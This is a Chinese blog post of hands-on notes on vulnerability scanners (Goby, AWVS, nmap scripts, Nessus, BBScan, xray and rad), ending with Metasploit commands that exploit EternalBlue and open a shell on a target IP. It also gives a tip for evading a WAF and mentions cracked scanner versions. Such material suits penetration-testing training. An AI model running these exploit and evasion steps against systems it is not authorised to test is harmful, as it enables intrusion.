当前位置: 首页 > article >正文

肝了三天三夜!最详尽的漏洞扫描工具实战笔记

GobyAWVS 漏洞扫描提示提示本文里面很多工具都是网址还有站长之家之类的csdn一直判断成暗链可以去我自己博客查看完整全文多说一句csdn对网安真的不友好全文链接都不让放。。。》[好淘云]《goby 和 AWVS 简介Goby 是针对目标企业梳理最全面的工具同构 goby 可以清晰的扫描出 ip 地址开放的端口以及端口对应的服务于此同时会根据开放的端口及应用进行实战化的测试并不在乎他的中低危害漏洞而更在乎的是它能直接 get shell 的漏洞AWVS 是针对 web 的轻量级的漏洞扫描工具。也就是根据我们提供的被扫描地址快速的扫描出其所有的漏洞包含高中低及信息泄露等漏洞。前戏下载 goby 和 awvs建议下载红队专版更强大goby 下载 awvs 的插件 将 awvs 的 api 添加到 goby 中 下载 npcap红队专版 goby 下载链接麻烦看下文章开头在 goby 中输入 ip 或者域名开始扫描一般是直接将子域名爆破出来直接全部加进去扫描结束后点击右边【Web 检测】左侧漏洞直接查看 goby 扫描出来的漏洞其实一般这个就够用了点击 awvs 按钮awvs 页面看到正在扫描goby 页面生成模板awvs 绕过 waf可以通过修改扫描速度和修改 user-agent 头来绕过 wafnmap需要常更新 nampwindowskali执行命令 sudo apt-get install nmap下载 vulscanwindowslinuxln -spwd/scipag_vulscan /usr/share/nmap/scripts/vulscan也可以之间下到 windows 中然后转移到 kali 里面 /usr/share/nmap/scripts/ 里面更新漏洞库:将下列文件下载下来放进 /vulscan/ 文件夹中看文章开头搜索原文。。。下载 nmap-vulnerswindows访问文章开头查看原文下载并放进 nmap\scripts\nmap-vulners*linuxcd /usr/share/nmap/scripts/git clone https://github.com/vulnersCom/nmap-vulners.git也可以之间下到 windows 中然后转移到 kali 里面 /usr/share/nmap/scripts/ 里面运行使用使用 vulscan 扫描推荐nmap -sV --scriptvulscan/vulscan.nse 192.168.242.137好像 windows 更多使用 nmap-vulners 扫描nmap -sV --scriptnmap-vulners/vulners.nse 192.168.242.137Nessus下载参考链接windows找了将近四天感觉最好的了主要为以下三步记一个遇到的问题浏览器打不开解决方法调整键盘为英文输入状态点击页面内的刷新按钮刷新一下页面然后用鼠标点击一下当前页面任意位置紧接着在当前页面使用键盘直接输入thisisunsafe 即可不是在地址栏输入就直接敲键盘就行了。使用New ScanBasic Network ScanBasic Network Scan 为简易的扫描一般用这个就够了。Advanced Scan 为在不使用任何建议的情况下配置扫描。配置基础信息 settings配置账号密码如果网站有账号密码需要配置 Credentials选择插件 plugins保存 save点击 ”” 进行扫描BBScan先通过 GitHub 下载 BBScan2安装库pip install -r requirements.txt扫描单个目标python BBScan.py --host [url]从文件导入目标python BBScan.py -f urls.txt参数Targets:--host[HOST[HOST...]]Scan several hosts fromcommandline-fTargetFile Load new line delimited targets from TargetFile-dTargetDirectory Load all *.txt files from TargetDirectory--crawlerCrawlDirectory Load all *.log crawl files from CrawlDirectory--networkMASK Scan all Target/MASK neighbour hosts, should be an integer between8and31HTTP SCAN:--rule[RuleFileName[RuleFileName...]]Import specified rule files only. -n, --no-crawl No crawling, sub folders will not be processed -nn, --no-check404 No HTTP404existence check--fullProcess all sub directories Scripts SCAN: --scripts-only Scan with user scripts only--script[ScriptName[ScriptName...]]Execute specified scripts only --no-scripts Disable all scripts CONCURRENT:-pPROCESS Num of processes running concurrently,30by default-tTHREADS Num of scan threadsforeach scan process,3by default OTHER:--proxyProxy Set HTTP proxy server--timeoutTimeout Max scan minutesforeach target,10by default-mdSave scan report as markdownformat--save-ports PortsDataFile Saveopenports to PortsDataFile--debugShow verbose debug info -nnn, --no-browser Do notopenweb browser to view report-vshow programs version number andexitxray工具下载地址所有工具不用百度限速云盘也可自行查找。好像破解工具只能用于 xray1.3.3使用下载下来先双击 xray_windows_amd64.exe然后 powershell 中运行.\xray_windows_amd64.exe genca 生成证书双击证书进行配置并配置代理127.0.0.1:7777windows 中使用时使用管理员模式运行 cmd或者使用 powershell。常用使用 HTTP 代理进行被动扫描xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output ming.html其他使用基础爬虫漏洞扫描xray_windows_amd64.exe webscan --basic-crawler http://example.com --html-output xxx.html快速测试单个 url, 无爬虫xray_windows_amd64.exe webscan --url http://example.com/?ab --html-output single-url.html其中未选择指定模块xray 默认全部扫描–html 以 html格式输出ming.html输出的网页也可以直接用图形化页面super-xray-1.7-system-jre与 burp 联动bp 配置在常规的抓包基础上burp 再配置一个下游的代理。将流量抓发给 xray 进行扫描。这里 bp 将流量抓发到本机的 7777 端口重点必须将 burp 中的“Set “Connection close”on incoming requests when using HTTP/1”取消勾选要不然 burp 会自动修改 neaders 中的 connection 的内容然后开启 xray 即可与 rad 联动附上一个 rad 下载地址(上面网盘里面也有)rad 也为长亭科技开发的一款目录爬取工具因为 xray 自动化爬取功能欠佳所以结合 rad 可以更高效的自动爬取。注意rad 只是爬取目标的目录不爬取子域1对单个域名监听先 xary 开启代理监听xray_windows_amd64.exe webscan –listen 127.0.0.1:7777 –html-output proxy.htmlrad 对目标进行爬取rad_windows_amd64.exe -t http://example.com -http-proxy 127.0.0.1:7777这样 rad 爬取的结果会自动转给 xray 进行扫描2使用脚本对多个域名监听使用python 1.py -r a.txt -o b.txt- r 为域名- o 为输出importargparseimporttimeparserargparse.ArgumentParser()txtNamestr(int(time.time())).txtparser.add_argument(-r,helpEnter the file you want to generate)parser.add_argument(-o,typestr,defaulttxtName,helpPlease enter the name of the file you want to output. Default istxtName)argsparser.parse_args()fopen(args.r,r)dataf.readlines()aforiindata: a; .\\rad_windows_amd64.exe -t {} --json abs.json --index.format(i.strip())f.close()fopen(args.o,w)f.write(a)f.close()同理甚至可以 xrayrad 和 burp 三者联动在这里我就不尝试了。MSFMetasploit FrameworkMSF 是一款 kali 自带漏洞利用及攻击程序含有三大模块msfconsole最常用的利用模块 msweb是 MSF 的图形化接口 msfupdate用于 MSF 的更新建议使用前先更新以永恒之蓝为例运行:msfconsole查找漏洞:search ms17-010利用:use exploit/windows/smb/ms17_010_eternalblue查看所需 payload:show options设置 payloadset RHOSTS 192.168.242.137开始攻击run反弹 shellshell浏览器直接搜索如 CVE-2008-4250查看漏洞公布平台等等。。。写在最后漏洞扫描工具只是我们渗透测试的第一步工具是死的人是活的。后续不管是进行内网渗透还是漏洞复现一个稳定、安全的测试环境如 VPS/ 云服务器是必不可少的。如果这篇文章对你有帮助欢迎点赞收藏有什么问题也可以在评论区交流。

相关文章:

肝了三天三夜!最详尽的漏洞扫描工具实战笔记

GobyAWVS 漏洞扫描 提示提示: 本文里面很多工具都是网址,还有站长之家之类的,csdn一直判断成暗链,可以去我自己博客查看完整全文: 多说一句:csdn对网安真的不友好,全文链接都不让放。。。》[好淘…...

宝藏网站推荐:云服务器特惠与网安学习资源的一站式聚合平台

① 平台核心功能与新手入门指南 对于刚接触云计算和网络安全的朋友来说,面对海量的云厂商活动和零散的技术文档,最容易陷入“选择困难症”。今天想跟大家分享一个我最近常逛的宝藏聚合平台——好淘云。它不像那种冷冰冰的资源站,更像是一个由…...

广汽全球化战略升级,加速迈入中国汽车出海主力阵营 | 美通社头条

、美通社消息:4月24日,在2026北京车展上,广汽国际举办了首个专场全球发布会,迎来了全球战略体系升级。现场观众规模超越以往,来自全球各地的经销商代表、重要合作伙伴及国内外主流媒体共计约330人齐聚广汽展台&#xf…...

世毫九理论体系|二十门基础学科基石清单(供世毫九研究学者指南)

世毫九理论体系|二十门基础学科基石清单 作者:方见华 单位:世毫九实验室 引言 世毫九理论体系作为一个覆盖微观认知到宏观宇宙的全域统一理论框架,其理论深度和广度在当代科学研究中具有开创性意义。该理论以认知几何学、对话量子…...

AI 能精准发现安全漏洞,漏洞修复的责任边界如何界定

上周,Anthropic公司公布了玻璃翼项目(Project Glasswing),其AI模型在发现软件漏洞方面效率惊人,以至于该公司采取了非常规措施推迟公开版本发布。目前仅向苹果、微软、谷歌、亚马逊等企业联盟开放访问权限,…...

高效率的粉碎者:HPH高压均质机构造全拆解

在液力端的精密范畴之中有一类设备,于乳品、制药、纳米材料等对颗粒细度具备极高要求的行业里,发挥着不可予以替代的作用,它便是“高压均质机”,行业内部常常简略称呼为HPH。高压均质机的核心动力来源于高压柱塞泵,它大…...

不花一分钱,10分钟搞定,2026销售录音总结怎么写每月省18小时多拿18成单率

我测评过不下20款AI录音转写总结工具,针对销售做每月客户拜访录音总结这个场景,听脑AI是同类工具中最值得用的。不花一分钱就能上手核心功能,10分钟就能搞定过去大半天的活,我接触过的几十位销售朋友反馈,用了之后每月…...

python signal

### 聊一聊 Python 的 signal:它到底是什么,能做什么,以及怎么用才不会出乱子 Signal 这个东西,听起来好像很底层,很“系统编程”。确实,它最初是 Unix 世界里的一个概念,就像一个传令兵&#x…...

2026最新亲测3款自动生成会议纪要免费神器,10分钟出稿好用到哭!

做技术的要整理需求评审会,做产品的要追项目进度记决策,做销售要整理客户拜访录音,做调研的要转用户访谈。试完2026年3款亲测有效的自动会议纪要工具,我直接给结论:听脑AI是同类工具中最值得用的,没有之一。…...

MCP AI推理配置紧急升级通知:CVE-2024-MCP-08已曝,未配置memory_limit_policy的实例存在RCE风险

更多请点击: https://intelliparadigm.com 第一章:MCP AI 推理配置紧急升级通知:CVE-2024-MCP-08已曝,未配置memory_limit_policy的实例存在RCE风险 漏洞核心影响 CVE-2024-MCP-08 是一个高危远程代码执行(RCE&#…...

远程容器开发环境安全加固指南(含CVE-2023-XXXX漏洞规避方案与RBAC最小权限实践)

更多请点击: https://intelliparadigm.com 第一章:远程容器开发环境安全加固概述 远程容器开发环境(如 VS Code Remote-Containers、GitHub Codespaces 或自建 devcontainer)在提升协作效率的同时,也引入了新的攻击面…...

量子-经典混合编排难题全解析,基于MCP 2026标准的4类典型故障诊断与容错加固指南

更多请点击: https://intelliparadigm.com 第一章:量子-经典混合编排的MCP 2026标准演进与核心约束 MCP 2026(Mixed Classical-Quantum Orchestration Protocol)标志着量子计算基础设施从实验性调度迈向生产级协同编排的关键转折…...

Docker运行AI模型必踩的3个安全雷区:从容器逃逸到模型窃取的全链路防护指南

更多请点击: https://intelliparadigm.com 第一章:Docker Sandbox 运行 AI 代码隔离技术概览 Docker Sandbox 是一种轻量级、强隔离的容器化运行时环境,专为安全执行不可信 AI 代码(如用户提交的推理脚本、自定义模型训练逻辑&a…...

PyTorch实现放疗剂量引擎:深度学习与医学物理结合

1. 项目概述:基于PyTorch的放疗剂量引擎现代放射治疗计划的核心挑战在于如何优化数千个参数(如多叶准直器位置、机架角度、监测单位等),以生成满足复杂临床要求的剂量分布。传统方法依赖治疗计划系统(TPS)的…...

PikaScript:轻量级Python引擎在MCU上的实现与应用

1. PikaScript:轻量级Python引擎在MCU上的实现作为一名嵌入式开发工程师,我一直在寻找能够在资源受限的微控制器上运行的Python实现。传统的MicroPython虽然优秀,但对硬件资源的要求较高,这使得它在许多低端MCU上难以运行。直到我…...

Cherry MX键帽3D模型库:解决个性化键盘制造的标准化方案

Cherry MX键帽3D模型库:解决个性化键盘制造的标准化方案 【免费下载链接】cherry-mx-keycaps 3D models of Chery MX keycaps 项目地址: https://gitcode.com/gh_mirrors/ch/cherry-mx-keycaps 想象一下这样的场景:你正在设计一款特殊布局的机械键…...

免费快速备份QQ空间:GetQzonehistory完整指南

免费快速备份QQ空间:GetQzonehistory完整指南 【免费下载链接】GetQzonehistory 获取QQ空间发布的历史说说 项目地址: https://gitcode.com/GitHub_Trending/ge/GetQzonehistory 你是否担心QQ空间里那些珍贵的青春记忆会随着时间流逝而消失?那些承…...

[具身智能-457]:为什么数据标准文件不直接生成yolo的标签文件的格式,还需要专门的转化?

简单来说,“数据标准格式”(如 COCO、VOC)是为了“人”和“通用性”设计的,而 YOLO 格式是为了“机器”和“极致速度”设计的。两者在设计哲学、存储结构和应用场景上存在巨大的鸿沟,因此无法直接通用,必须…...

边缘计算中VLA模型性能优化与ActionFlow实践

1. 边缘设备上VLA模型的性能挑战与ActionFlow解决方案 在机器人控制领域,视觉-语言-动作(Vision-Language-Action, VLA)模型正成为实现智能体与环境交互的新范式。这类模型通过端到端的方式将视觉感知、语言理解和动作生成统一在一个框架中&a…...

数字孪生技术助力运动员心脏健康监测,开启医疗新时代

塔塔咨询服务公司(TCS)近日展示了一项数字医疗技术成果——为一名残障运动员创建了心脏数字孪生模型,这也是该公司"未来运动员项目"的重要组成部分。随着数字技术的持续进步与硬件成本的不断下降,个性化健康监测正逐步走…...

韩国大学研究团队找到了AI安全防护的“手术刀“

这项由韩国大学(Korea University)与AIGEN Sciences联合开展的研究,发表于2026年ICLR(国际学习表征会议)会议论文集,论文编号为arXiv:2509.25843v2,于2026年4月14日更新。你有没有想过&#xff…...

LeapAlign如何从根本上改变图像生成的对齐方式

这项由澳大利亚国立大学与字节跳动Seed团队联合开展的研究,以预印本形式发布于2026年4月16日,论文编号为arXiv:2604.15311。感兴趣的读者可以通过该编号在arXiv平台上查阅完整论文。一、当AI绘图遇上"偏科"难题每当你在网上看到那些令人叹服的…...

英国MediaTek研究院找到了让不同AI互相“听懂“彼此的通用翻译层

这项由英国剑桥MediaTek Research团队完成的研究,以预印本形式发布于2026年4月,论文编号为arXiv:2604.07466v2,感兴趣的读者可通过该编号查阅完整原文。你有没有试过让两个说着不同方言的人互相传话?假设一个人只说粤语&#xff0…...

AI大模型的“文件包“技术,让推理速度提升近20倍

这项研究由慕尼黑工业大学、达姆施塔特工业大学、浙江大学以及伊尔梅瑙工业大学的研究团队联合完成,发表于2026年第40届神经信息处理系统大会(NeurIPS 2026),论文编号为arXiv:2604.13226,有兴趣深入了解的读者可通过该…...

胡桃讲编程|你知道吗?音乐行业除了 V 家(VOCALOID)还有这些家族!

作者:龙沅可前言哈喽各位码农、技术爱好者、音乐制作小伙伴,这里是胡桃讲编程专属科普栏目!常规我们聊代码、框架、后端开发,但本期拓宽边界:只要和电脑、数字技术挂钩的内容,胡桃都会拆解科普。提到 AI 虚…...

卷积风格布局器:突破内存墙的硬件加速技术

1. 卷积风格布局器:突破内存墙的硬件加速关键技术在视觉语言模型(VLM)和卷积神经网络加速领域,内存访问效率一直是制约性能提升的关键瓶颈。传统解决方案通常采用数据复制或输入重排序来避免存储体冲突,但这会导致高达8倍的内存开销。我们团队…...

番茄小说下载器终极指南:如何轻松打造个人数字图书馆

番茄小说下载器终极指南:如何轻松打造个人数字图书馆 【免费下载链接】Tomato-Novel-Downloader 番茄小说下载器不精简版 项目地址: https://gitcode.com/gh_mirrors/to/Tomato-Novel-Downloader 在数字阅读时代,你是否曾为找不到心仪的小说资源而…...

万兴科技加码AI漫剧,旗下万兴剧厂全球首批集成TGI2及可灵AI原生4K

近日,AIGC软件A股上市公司万兴科技(300624.SZ)亮相GTC2026全球流量大会,重磅宣布旗下AI驱动的一站式精品漫剧创作平台万兴剧厂(reelmate.cn)全球首批集成Kling AI Native 4K模型(可灵AI原生4K模…...

Driver Store Explorer完整指南:免费清理Windows驱动垃圾,轻松释放磁盘空间

Driver Store Explorer完整指南:免费清理Windows驱动垃圾,轻松释放磁盘空间 【免费下载链接】DriverStoreExplorer Driver Store Explorer 项目地址: https://gitcode.com/gh_mirrors/dr/DriverStoreExplorer 你的Windows系统盘空间是否总是不够用…...

【MCP 2026AI推理集成黄金窗口期】:仅剩117天!错过将无法对接2026Q1国家AI算力调度中枢API网关

更多请点击: https://intelliparadigm.com 第一章:MCP 2026AI推理集成概览与战略意义 MCP(Model-Centric Pipeline)2026AI 是面向下一代边缘-云协同推理场景构建的标准化推理集成框架,其核心目标是统一异构硬件抽象、…...